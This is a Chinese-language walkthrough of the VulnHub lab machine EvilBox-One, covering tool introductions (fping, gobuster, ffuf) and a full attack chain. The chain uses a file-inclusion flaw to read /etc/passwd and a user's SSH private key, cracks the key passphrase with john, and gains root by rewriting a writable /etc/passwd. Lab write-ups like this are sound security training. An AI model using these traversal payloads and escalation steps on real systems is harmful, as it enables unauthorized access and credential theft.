一、前言提要

靶机地址：https://download.vulnhub.com/evilbox/EvilBox---One.ova

难度等级：低→中

打靶目标：取得 root 权限 + 2 Flag

这是二珂选择让大家一起来打靶的第一个的靶机，虽然难度属于中低级别，但这样的靶机对于初学者学习更加有益
我个人感觉该靶机的打靶过程还是蛮有趣的。该靶机的边界突破和提权方法都非常具有新意，与我们以往的打靶过
程非常不同，可以很好的扩展渗透思路和补强个人能力的短版。这样的靶机对于初学者学习更加有益。


1.1靶机环境配置

将kali和靶机镜像放置同一个网段，靶机和kali均如下配置



二、本次使用工具介绍

2.1fping

fping命令 fping类似于ping，但比ping强大。与ping要等待某一主机连接超时或发回反馈信息不同，fping给一个
主机发送完数据包后，马上给下一个主机发送数据包，实现多主机同时ping，fping还可以在命令行中指定要ping
的主机数量范围。

参数：

-a  # 显示存活的主机
-b  # ping 数据包的大小。（默认为56）
-c  # ping每个目标的次数 (默认为1)
-f  # 从文件获取目标列表(不能与 -g 同时使用)
-l  # 循环发送ping
-g  # 通过指定开始和结束地址来生成目标列表,可以使网段
-u  # 显示不可到达的目标

2.2Gobuster

Gobuster是一个可以对目标网址进行目录扫描的工具，它大概总共有四种模式：dir模式、dns模式、vhost模式、s3模式
我感觉他用起来比dirb要快很多，而且可调控的参数比较多，所以功能方面远比dirb和dirsearch要强大的多，所以比较建
议扫描目录使用这个工具。

dir - 经典的目录暴力破解模式

dns - DNS 子域暴力破解模式

s3 - 枚举打开的 S3 存储桶并查找存在和存储桶列表

vhost - 虚拟主机暴力破解模式（与 DNS 不同！）

常用Dir模式

gobuster dir-u https://example.com -t 50 -w /usr/share/wordlists/dirb/big.txt -x php,html,asp,txt

gobuster dir -u http://example.com -w /usr/share/wordlists/dirb/big.txt -t 50

2.3FFuf

Go语言编写的高速Web Fuzzer，一个字，快！允许fuzz HTTP header值POST数据和URL的不同部分
包括GET数名称和值；支持静默模式（-s）；模块化架构；易于添加的过滤器和匹配器

该工具用途广泛，可用于多种用途：

• 目录发现，可选择在 URL 中的任何位置进行模糊测试。
• 子域名发现
• 使用各种 HTTP 方法进行模糊测试

三、涉及攻击方法

3.1主机发现

└─$ fping -gaq 192.168.147.0/24


3.2网络扫描

└─$ nmap 192.168.147.134

└─$ sudo nmap -p22,80 -sV -sS 192.168.147.134


打开web服务页面，居然只是apache的初始页面。


└─$ gobuster dir -u http://192.168.147.134/ -w /usr/share/seclists/Discov
ery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp

进行一波隐藏目录探测，也仅仅探测出来一点点。


其中的robots.txt在去访问时，界面显示：Hello H4x0r；根据页面显示猜测，后面会不会有需要到
这个用户名的地方，暂时保留信息：H4x0r（虽然后面没有用到）


我们发现一个新出的目录/secret，去访问的时候发现是一个空白页面，源代码也确实是一片空白；
所以我们尝试进一步探测该目录下的子目录
结果显示探测到一个唯一的新目录/ecil.php，当满怀期待去访问
却再一次发现是一片空白

└─$ gobuster dir -u http://192.168.147.134/secret/ -w /usr/share/seclists/Dis
covery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp


3.3参数爆破

这个时候其他方向也已经没有路可走，目前唯一可想到的线索就只有evil.php页面

所以我们尝试着对evil.php进行参数爆破，通常我们使用Burp，但是这里推荐使用到一个新工具：ffuf

我们手动生成一个小字典，作为参数传入，这些参数都是我们日常测试的时候常用到的

└─$ vi kkboss.txt
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:PA
RAM -w kkboss.txt:kk -u http://192.168.147.134/secret/evil.php?PARAM=kk -fs 0

第一次参数爆破失败......继续尝试；我们修改我们的赋值，同时更换字典；据了解在各种各样的漏
洞都存在包含漏洞，所以我们把kk的值修改为一个一定存在的文件：../../../index.html，去继续
尝试爆破参数名

└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-na
mes.txt -u http://192.168.147.134/secret/evil.php?FUZZ=../index.html -fs 0


恭喜成功迈出一步，此时跑出来了一个command参数，去浏览器确认，可以正常访问；
此时这里存在文件包含引用操作


3.4文件包含

http://192.168.147.134/secret/evil.php?command=../../../../../../../../etc/passwd


在该文件下发现一个新用户名：mowree（记下来，后面有用）；

此时已经确认存在文件包含漏洞，尝试着远程文件包含，我们在本地构建一句话webshell，

然后进入/var/www/html目录下构造一句话木马，并开启apache服务；再去远程文件包含，但是尝试失败

..../secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php
.../secret/evil.php?command=php://filter/write=convert.base64-de
code/resource=test.php&txt=NDU2


这里可以看到这里直接进行了文件包含，但是还是不能突破边界，我们尝试写入webshell，但是我们不知道
账号是否存在写入权限，我们尝试将一个经过base64编码后的字符写入test.php中，但是去访问时发现写入
失败 所以我们还是回到我们的最初的/etc/passwd中


3.5任意文件读取

ssh mowree@192.168.147.134 -v


ssh探测一波发现，不仅可以密码登录还可以公钥登录。如果它支持公钥验证那么在
这个账号下应该存在有这个公钥的内容

/secret/evil.php?command=../../../../home/mowree/.ssh/authorized_keys
/secret/evil.php?command=../../../../home/mowree/.ssh/id_


我们可以得到mowree这个账号的公钥信息，既然有公钥信息，那岂不是也有私钥信息了并且使
用的rsa算法进行加密的，默认生成的私钥名称为id_rsa

secret/evil.php?command=../../../../home/mowree/.ssh/id_rsa


3.6SSH公钥登录

└─$ vi id_rsa
└─$ chmod 600 id_rsa
└─$ ssh mowree@192.168.147.134 -i id_rsa


离线密码破解

└─$ cp /usr/share/wordlists/rockyou.txt.gz .
└─$ gunzip rockyou.txt.gz
└─$ cd /usr/share/john
└─$ ls
└─$ ./ssh2john.py ~/id_rsa > ~/kk
└─$ cd
└─$ ls
└─$ john kk --wordlist=rockyou.txt


得到id_rsa的密码：unicorn，得到Flag-1


3.7系统权限漏洞利用

crontab -l  查看一下有没有计划任务
sudo -l     查看一下sudo
uname -a    查看一些内核版本
find / -perm /4000 2>/dev/null   查看一下suid
find / -perm /2000 2>/dev/null
find / -writable 2>/dev/null    查找具有写入权限的文件
find / -writable 2>/dev/null | grep -v proc 过滤一下

发现etc/passwd下的文件居然是可写入的，但是正常情况下只有root权限可以写入


/etc/passwd的内容.这里存放着所有linux账号的信息和密码,但是出于系统安全性的考虑所有的密
码都被x所替换,而真正的密码存在/etc/shadow中。

既然我们可以修改这个文件，那我们就可以直接把这个x替换掉，开始替换root的密码
首先给root账号生成一个密码。

openssl passwd -1

vi /etc/passwd


直接su 拿到权限，cd /root目录下成功拿到第二个flag。